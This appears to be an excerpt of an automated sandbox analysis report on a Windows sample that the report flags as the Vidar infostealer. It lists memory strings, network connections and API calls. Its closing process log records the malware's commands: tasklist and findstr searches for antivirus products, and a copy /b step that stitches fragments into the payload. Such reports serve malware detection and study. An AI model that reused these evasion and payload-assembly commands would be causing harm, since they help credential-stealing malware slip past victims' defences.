                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218846363.0000027800D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217204874.0000027800964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216858307.0000027800850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217762686.0000027800B30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215785880.00000278005A8000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent.
                Source: chrome.exe, 0000000F.00000002.2215275180.000002780040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 0000000F.00000002.2217511194.0000027800A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 0000000F.00000002.2213890186.000002780000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 0000000F.00000003.2185016501.0000027803018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2184000571.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184338732.0000027803074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2188193381.00000278013D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2226828883.0000027803020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2188149298.0000027802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2185016501.0000027803018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00A9F7C7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00A9F55C
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00AB9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00AB9FD2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A3FFE0 CloseHandle,NtProtectVirtualMemory,10_2_00A3FFE0
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A94763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00A94763
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00A81B4D
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00A8F20D
                Source: C:\Users\user\Desktop\yoda.exeFile created: C:\Windows\PerformerNextelJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeFile created: C:\Windows\ConsequenceCoalitionJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeFile created: C:\Windows\PhilipsFavorsJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A4801710_2_00A48017
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A2E1F010_2_00A2E1F0
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A3E14410_2_00A3E144
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A422A210_2_00A422A2
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A222AD10_2_00A222AD
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A5A26E10_2_00A5A26E
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A3C62410_2_00A3C624
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00AAC8A410_2_00AAC8A4
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A5E87F10_2_00A5E87F
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A56ADE10_2_00A56ADE
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A92A0510_2_00A92A05
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A88BFF10_2_00A88BFF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A3CD7A10_2_00A3CD7A
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A4CE1010_2_00A4CE10
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A5715910_2_00A57159
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A2924010_2_00A29240
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00AB531110_2_00AB5311
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A296E010_2_00A296E0
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A4170410_2_00A41704
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A41A7610_2_00A41A76
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A47B8B10_2_00A47B8B
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A29B6010_2_00A29B60
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A47DBA10_2_00A47DBA
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A41D2010_2_00A41D20
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A41FE710_2_00A41FE7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: String function: 00A3FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: String function: 00A40DA0 appears 46 times
                Source: C:\Users\user\Desktop\yoda.exeCode function: String function: 004062CF appears 58 times
                Source: yoda.exeStatic PE information: invalid certificate
                Source: yoda.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 2NG4E3.10.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/47@5/6
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A941FA GetLastError,FormatMessageW,10_2_00A941FA
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A82010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00A82010
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A81A0B AdjustTokenPrivileges,CloseHandle,10_2_00A81A0B
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00A8DD87
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A93A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00A93A0E
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HNGTT57S.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                Source: C:\Users\user\Desktop\yoda.exeFile created: C:\Users\user\AppData\Local\Temp\nsm6564.tmpJump to behavior
                Source: yoda.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\yoda.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 0000000F.00000002.2217452713.0000027800A1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};
                Source: chrome.exe, 0000000F.00000002.2216169540.00000278006DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: V3790H47G.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: yoda.exeVirustotal: Detection: 32%
                Source: yoda.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\yoda.exeFile read: C:\Users\user\Desktop\yoda.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\yoda.exe "C:\Users\user\Desktop\yoda.exe"
                Source: C:\Users\user\Desktop\yoda.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com A
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
